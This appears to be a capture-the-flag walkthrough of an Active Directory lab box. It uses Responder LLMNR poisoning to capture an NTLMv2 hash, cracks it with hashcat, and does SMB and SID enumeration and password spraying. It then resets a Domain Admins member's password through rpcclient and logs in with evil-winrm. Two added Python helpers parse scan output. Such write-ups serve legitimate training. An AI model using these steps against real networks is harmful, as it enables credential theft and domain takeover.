Difficulty: Medium
Kali: 192.168.56.104
Target: 192.168.56.126
root@kali2 [~] ➜ arp-scan -l [15:58:03]
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.1.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1 78:60:5b:04:b4:8c TP-LINK TECHNOLOGIES CO.,LTD.
192.168.1.102 08:00:27:6a:d2:74 PCS Systemtechnik GmbH
Port scan
root@kali2 [~/Desktop/dc03] ➜ nmap -n -Pn -sS -p- --min-rate="5000" 192.168.1.102 -oG ports.txt [15:58:36]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-08 15:58 CST
Nmap scan report for 192.168.1.102
Host is up (0.00036s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49674/tcp open unknown
49715/tcp open unknown
49772/tcp open unknown
root@kali2 [~/Desktop/dc03] ➜ cat ports.txt | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',' [15:59:21]
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49674,49715,49772
root@kali2 [~/Desktop/dc03] ➜ nmap 192.168.1.102 -sV -A -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49674,49715,49772 [15:59:22]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-08 15:59 CST
Nmap scan report for 192.168.1.102
Host is up (0.0015s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-08 22:59:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49715/tcp open msrpc Microsoft Windows RPC
49772/tcp open msrpc Microsoft Windows RPC
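The grep/awk pipeline above pulls the open ports out of the grepable (-oG) file by pattern-matching `NN/open`. As an added example (not from the original post), here is the same extraction done on the structured fields of that format in Python, so the port state, protocol and service name are kept and `open|filtered` ports can be included or excluded deliberately; the sample file contents are constructed.

```python
"""Parse nmap grepable output (-oG) and build the -p list for a follow-up version scan."""
import re
from collections import defaultdict

# Constructed sample of what `nmap -sS -p- -oG ports.txt` writes (not the page's real file).
SAMPLE_OG = """# Nmap 7.94SVN scan initiated Thu Aug  8 15:58:36 2024 as: nmap -n -Pn -sS -p- -oG ports.txt 192.168.1.102
Host: 192.168.1.102 ()\tStatus: Up
Host: 192.168.1.102 ()\tPorts: 53/open/tcp//domain///, 88/open/tcp//kerberos-sec///, 135/open/tcp//msrpc///, 5985/open|filtered/tcp//wsman///, 3389/closed/tcp//ms-wbt-server///\tIgnored State: filtered (65531)
# Nmap done at Thu Aug  8 15:58:40 2024 -- 1 IP address (1 host up) scanned in 4.21 seconds
"""

# One Ports entry is port/state/protocol/owner/service/rpcinfo/version/
PORT_ENTRY = re.compile(r"^(\d{1,5})/([^/]*)/([^/]*)/[^/]*/([^/]*)/")


def parse_grepable(text, wanted_states=("open",)):
    """Return {host: [(port, proto, service), ...]} for ports whose state is in wanted_states."""
    found = defaultdict(list)
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # skip the '# Nmap ...' header and footer comments
        # Fields are tab-separated "Key: value" pairs (Host, Status, Ports, Ignored State, ...)
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        host = fields["Host"].split(" ", 1)[0]  # "192.168.1.102 ()" -> "192.168.1.102"
        for entry in fields.get("Ports", "").split(", "):
            m = PORT_ENTRY.match(entry.strip())
            if m and m.group(2) in wanted_states:
                found[host].append((int(m.group(1)), m.group(3), m.group(4)))
    return dict(found)


def port_argument(ports):
    """Format port tuples as the comma-separated list nmap -p expects (sorted, deduplicated)."""
    return ",".join(str(p) for p in sorted({p for p, _, _ in ports}))


if __name__ == "__main__":
    for host, ports in parse_grepable(SAMPLE_OG).items():
        print(host, port_argument(ports))
```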
Domain name: SOUPEDECODE.LOCAL
After that I went through a whole series of enumeration and brute-force attempts and came up with nothing...
Responder
Several days later I opened the box again and remembered the Responder LLMNR spoofing experiment I had done earlier. I gave it a try on a whim and captured an NTLM hash, which shows that LLMNR is enabled.
https://tao0845.github.io/posts/b774aeb/?highlight=llmnr
root@kali2 [~/Desktop] ➜ responder -I eth0 -wd
...
...
[!] Error starting TCP server on port 80, check permissions or other servers running.
[*] [DHCP] Found DHCP server IP: 192.168.1.1, now waiting for incoming requests...
[*] [MDNS] Poisoned answer sent to 192.168.1.106 for name FileServer.local
[*] [LLMNR] Poisoned answer sent to fe80::c1b0:ce8d:8998:df5f for name FileServer
[*] [NBT-NS] Poisoned answer sent to 192.168.1.106 for name FILESERVER (service: File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.1.106 for name FileServer
[*] [MDNS] Poisoned answer sent to 192.168.1.106 for name FileServer.local
[*] [MDNS] Poisoned answer sent to fe80::c1b0:ce8d:8998:df5f for name FileServer.local
[*] [LLMNR] Poisoned answer sent to fe80::c1b0:ce8d:8998:df5f for name FileServer
[*] [LLMNR] Poisoned answer sent to 192.168.1.106 for name FileServer
[*] [MDNS] Poisoned answer sent to fe80::c1b0:ce8d:8998:df5f for name FileServer.local
[SMB] NTLMv2-SSP Client : fe80::c1b0:ce8d:8998:df5f
[SMB] NTLMv2-SSP Username : soupedecode\xkate578
[SMB] NTLMv2-SSP Hash : xkate578::soupedecode:e5de4a041c0c5baf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
[+] Exiting..
Crack it with hashcat
root@kali2 [~/Desktop/dc03] ➜ hashcat aaa /usr/share/wordlists/rockyou.txt --force -m 5600 [19:48:14]
hashcat (v6.2.6) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-12th Gen Intel(R) Core(TM) i7-12700H, 1142/2349 MB (512 MB allocatable), 1MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344394
* Bytes.....: 139921521
* Keyspace..: 14344387
* Runtime...: 1 sec
XKATE578::soupedecode:e5de4a041c0c5baf:1776c6b1bafc80407a72c8f6224b5d46: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:jesuschrist
Got the password jesuschrist. WinRM login doesn't work, so let's look at SMB.
SMB probing
root@kali2 [~/Desktop/dc03] ➜ smbmap -u XKATE578 -p jesuschrist -H 192.168.1.106 [19:53:24]
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.1.106:445 Name: 192.168.1.106 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
share READ, WRITE
SYSVOL READ ONLY Logon server share
[*] Closed 1 connections
root@kali2 [~/Desktop/dc03] ➜ smbclient -U 'XKATE578%jesuschrist' //192.168.1.106/share [19:54:06]
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Aug 10 15:19:10 2024
.. D 0 Thu Aug 1 13:38:08 2024
desktop.ini AHS 282 Thu Aug 1 13:38:08 2024
user.txt A 70 Thu Aug 1 13:39:25 2024
12942591 blocks of size 4096. 10832683 blocks available
smb: \> get user.txt
getting file \user.txt of size 70 as user.txt (4.3 KiloBytes/sec) (average 4.3 KiloBytes/sec)
smb: \> get desktop.ini
getting file \desktop.ini of size 282 as desktop.ini (18.4 KiloBytes/sec) (average 11.1 KiloBytes/sec)
That gets us the user flag and a desktop configuration file.
root@kali2 [~/Desktop/dc03] ➜ cat desktop.ini [19:56:10]
[.ShellClassInfo]
LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21769
IconResource=%SystemRoot%\system32\imageres.dll,-183
No idea yet what it is for; keep gathering information.
Attack attempts
root@kali2 [~/Desktop/dc03] ➜ lookupsid.py xkate578@192.168.1.106 [20:00:10]
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Password:
[*] Brute forcing SIDs at 192.168.1.106
[*] StringBinding ncacn_np:192.168.1.106[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\Administrator (SidTypeUser)
501: SOUPEDECODE\Guest (SidTypeUser)
502: SOUPEDECODE\krbtgt (SidTypeUser)
512: SOUPEDECODE\Domain Admins (SidTypeGroup)
...
That gives us some usernames; let's tidy up the data.
root@kali2 [~/Desktop/dc03] ➜ cat users.txt | grep -Eo "CODE\\\\\S*" | sed 's/CODE\\//' > users.txt
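As an added example (not from the original post), the same clean-up of the lookupsid.py output in Python: it keeps only SidTypeUser entries, so group names like `Domain Admins` do not end up in the user list, and it writes to a file other than the one it reads (redirecting a pipeline into its own input file empties it first). The sample output below is constructed from the lines shown above.

```python
"""Turn lookupsid.py output into a clean list of sAMAccountNames."""
import re
from pathlib import Path

# Constructed sample in the shape of the lookupsid.py run above (RID 1221 is the one shown
# later in the whoami /all output for fbeth103).
SAMPLE_LOOKUPSID = """Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Brute forcing SIDs at 192.168.1.106
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
498: SOUPEDECODE\\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\\Administrator (SidTypeUser)
501: SOUPEDECODE\\Guest (SidTypeUser)
502: SOUPEDECODE\\krbtgt (SidTypeUser)
512: SOUPEDECODE\\Domain Admins (SidTypeGroup)
1221: SOUPEDECODE\\fbeth103 (SidTypeUser)
"""

# "RID: DOMAIN\name (SidTypeXxx)" -- the name may contain spaces, so match it greedily
ENTRY = re.compile(r"^(\d+): (?P<domain>[^\\]+)\\(?P<name>.+) \((?P<type>SidType\w+)\)$")


def parse_lookupsid(text):
    """Yield (rid, domain, name, sidtype) for every resolved SID line."""
    for line in text.splitlines():
        m = ENTRY.match(line.strip())
        if m:
            yield int(m.group(1)), m.group("domain"), m.group("name"), m.group("type")


def user_names(text, skip_builtin=True):
    """Return sAMAccountNames of SidTypeUser entries; optionally drop RIDs < 1000 (built-in accounts)."""
    names = []
    for rid, _domain, name, sidtype in parse_lookupsid(text):
        if sidtype != "SidTypeUser":
            continue  # groups and aliases such as 'Domain Admins' are not logon names
        if skip_builtin and rid < 1000:
            continue  # Administrator, Guest and krbtgt have well-known RIDs
        names.append(name)
    return names


def write_user_list(text, dest):
    """Write one name per line to dest (a different file from the raw output); return the count."""
    names = user_names(text)
    Path(dest).write_text("\n".join(names) + "\n", encoding="utf-8")
    return len(names)


if __name__ == "__main__":
    print(user_names(SAMPLE_LOOKUPSID, skip_builtin=False))
```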
Brute-force with that list
root@kali2 [~/Desktop/dc03] ➜ crackmapexec smb 192.168.1.106 -u users.txt -p users.txt --continue-on-success
SMB 192.168.1.106 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.1.106 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:Enterprise STATUS_LOGON_FAILURE
SMB 192.168.1.106 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:Administrator STATUS_LOGON_FAILURE
SMB 192.168.1.106 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:Guest STATUS_LOGON_FAILURE
SMB 192.168.1.106 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:krbtgt STATUS_LOGON_FAILURE
SMB 192.168.1.106 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:Domain STATUS_LOGON_FAILURE
SMB 192.168.1.106 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:Domain STATUS_LOGON_FAILURE
SMB 192.168.1.106 445 DC01 [-] SOUPEDECODE.LOCAL\Enterprise:Domain STATUS_LOGON_FAILURE
...
...
All failures.
Try AS-REP roasting
root@kali2 [~/Desktop/dc03] ➜ GetNPUsers.py -usersfile users.txt -no-pass -dc-ip 192.168.1.106 soupedecode.local/
Still nothing but failures: there are no users with pre-authentication disabled, so we probably have to start from the XKATE578 user.
LDAP information gathering
Try ldapdomaindump
Retrieve information about the domain members
root@kali2 [~/Desktop/dc03] ➜ python -m ldapdomaindump -u SOUPEDECODE.LOCAL\\XKATE578 -p 'jesuschrist' 192.168.1.107 [20:59:29]
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
This user turns out to be in the Account Operators group, so let's look at that group's permissions.
Members of this group can manage domain user and group accounts, but they cannot manage domain administrators.
So we have to go after other members.
I found one member that stands out, ``, who is in the Operators group.
Following that up, this group is itself a member of the Domain Admins group. If we can change this member's password, we have effectively obtained domain admin privileges.
Privilege escalation
Since WinRM login isn't possible, the only way in is over the RPC protocol.
https://cloud.tencent.com/developer/article/1850814
That article has a fairly complete list of rpcclient commands; let's try forcing a password change.
root@kali2 [~/Desktop/dc03] ➜ rpcclient -U "xkate578" 192.168.1.107 [21:21:18]
Password for [WORKGROUP\xkate578]:
rpcclient $> setuserinfo2 fbeth103 23 Passw0rd!
result: NT_STATUS_ACCESS_DENIED
result was NT_STATUS_ACCESS_DENIED
???
Checking on the DC, it turns out this is a setting: because of a security policy, the box locks things down after ten-odd minutes and no longer allows fbeth103's password to be changed, so the only option was to re-import the VM.
root@kali2 [~/Desktop/dc03] ➜ rpcclient -U "xkate578" 192.168.1.108 [21:29:15]
Password for [WORKGROUP\xkate578]:
rpcclient $> setuserinfo2 fbeth103 23 passw0rd!
rpcclient $>
This time the change should have gone through.
root@kali2 [~/Desktop/dc03] ➜ evil-winrm -i 192.168.1.108 -u "fbeth103" -p passw0rd! [21:29:26]
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\fbeth103\Documents> whoami
soupedecode\fbeth103
*Evil-WinRM* PS C:\Users\fbeth103\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
soupedecode\fbeth103 S-1-5-21-2986980474-46765180-2505414164-1221
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================== ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Operators Group S-1-5-21-2986980474-46765180-2505414164-2165 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Domain Admins Group S-1-5-21-2986980474-46765180-2505414164-512 Mandatory group, Enabled by default, Enabled group
SOUPEDECODE\Denied RODC Password Replication Group Alias S-1-5-21-2986980474-46765180-2505414164-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
It really is in the Domain Admins group.
*Evil-WinRM* PS C:\users\administrator\desktop> type root.txt
.*
Done.